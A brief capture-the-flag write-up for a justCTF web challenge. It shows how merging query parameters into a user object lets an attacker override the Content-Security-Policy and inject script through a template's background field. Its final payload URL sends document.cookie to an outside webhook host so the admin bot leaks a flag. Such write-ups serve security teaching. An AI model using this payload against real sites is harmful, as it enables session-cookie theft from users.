The server source code is provided for this challenge.  
On index.ejs we have the following:  
```  
<script>  
// load background...  
main.innerHTML += `  
![](<%- unmodifiable?.background %>)  
`;  
console.log('Loaded!');  
</script>  
```  
On app.js we have the following:  
```  
if (req.query.text) {  
res.user = { ...res.user, ...req.query };  
}  
// Safety layer 5  
res.set("Content-Security-Policy", res.user.unmodifiable.CSP ?? defaultCSP);  
[...]  
app.get("/", (req, res) => {  
res.render("index", { ...res.user });  
});  
```  
This allows us to inject a unmodifiable.background and a unmodifiable.CSP
property via the GET query parameters. This gives us both XSS via the
background property and CSP overwrite via the CSP property. Final payload:  
```  
http://xssl.web.jctf.pro/?text=hi&[unmodifiable][CSP]=a&[unmodifiable][background]=https://webhook.site/f202667e-9179-425d-80c1-fd62da5915d4?${document.cookie}  
```  
This sends the document.cookie to the webhook above in this case. Now we just
report it using the "report as inappropriate" button and the server bot will
visit this link. The bot will send the cookie to us on the webhook:  
```  
Query strings  
flag justCTF{M4nY_L4y3rS_M4nY_f4ilur3s_ae5bda97-8543-4a4b-84bf-22c6a0df6bdf}  
```

Original writeup (https://youtu.be/S_9TPRNPgn0).